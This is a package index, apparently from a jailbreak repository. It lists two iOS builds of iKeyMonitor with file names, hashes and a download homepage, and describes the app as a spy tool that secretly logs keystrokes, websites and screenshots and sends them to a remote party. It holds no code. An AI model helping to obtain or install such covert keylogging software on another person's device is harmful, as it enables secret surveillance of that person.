Name: iKeyMonitor keylogger - iPad/iPhone Key logger
Depiction: https://ikeymonitor.com/apt/ikm-depiction.html
Package: com.aw.mobile.ikm
Version: 5.1.0-20+debug
Architecture: iphoneos-arm
Maintainer: support@ikeymonitor.com
Installed-Size: 19556
Depends: firmware(>= 3.0), mobilesubstrate, zip(>= 2.0), com.rpetrich.rocketbootstrap(>= 1.0.6), gawk
Conflicts: com.aw.mobile.ikm64, com.aw.mobile.ikm.customized
Filename: debs/com.aw.mobile.ikm_5.1.0-20+debug_iphoneos-arm.deb
Size: 6057538
MD5sum: cb4d335f7b7a9418f0dcd036beec6ac9
SHA1: 7e27e7269ba36404fe1f4193a44d563633283f1d
SHA256: adca7da400a21a9b388ab580f59f7d0109b61949e074240780340172b69b2242
Section: Security
Homepage: https://ikeymonitor.com
Description: iKeyMonitor is an Spy App for iPad/iPhone. It Secretly Logs keystrokes, websites, screenshots and delivers them to you by Email or Online Panel.
Author: iKeyMonitor.com <support@ikeymonitor.com>
Depiction: https://ikeymonitor.com/apt/ikm-depiction.html
Name: iKeyMonitor - iOS 11.x & below

Package: com.aw.mobile.ikm
Version: 6.0.0-30+debug
Architecture: iphoneos-arm
Maintainer: support@ikeymonitor.com
Installed-Size: 11792
Depends: firmware(>= 11.0), mobilesubstrate, zip(>= 2.0), com.rpetrich.rocketbootstrap(>= 1.0.6), gawk
Conflicts: com.aw.mobile.ikm64, com.aw.mobile.ikm.customized
Filename: debs/com.aw.mobile.ikm_6.0.0-30+debug_iphoneos-arm.deb
Size: 1654926
MD5sum: 0e6006407794c58f0f1aef4798442e82
SHA1: 5338c0bfd7007f113c4a72a954e1f1133337ef91
SHA256: d339ea1f852bdb53aea039411389abfe870e352b5c13e95f03c9bea65551f802
Section: Security
Homepage: https://ikeymonitor.com
Description: iKeyMonitor is an Spy App for iPad/iPhone. It Secretly Logs keystrokes, websites, screenshots and delivers them to you by Email or Online Panel.
Author: iKeyMonitor.com <support@ikeymonitor.com>
Depiction: https://ikeymonitor.com/apt/ikm-depiction.html
Name: iKeyMonitor iOS 12.x & 13.x

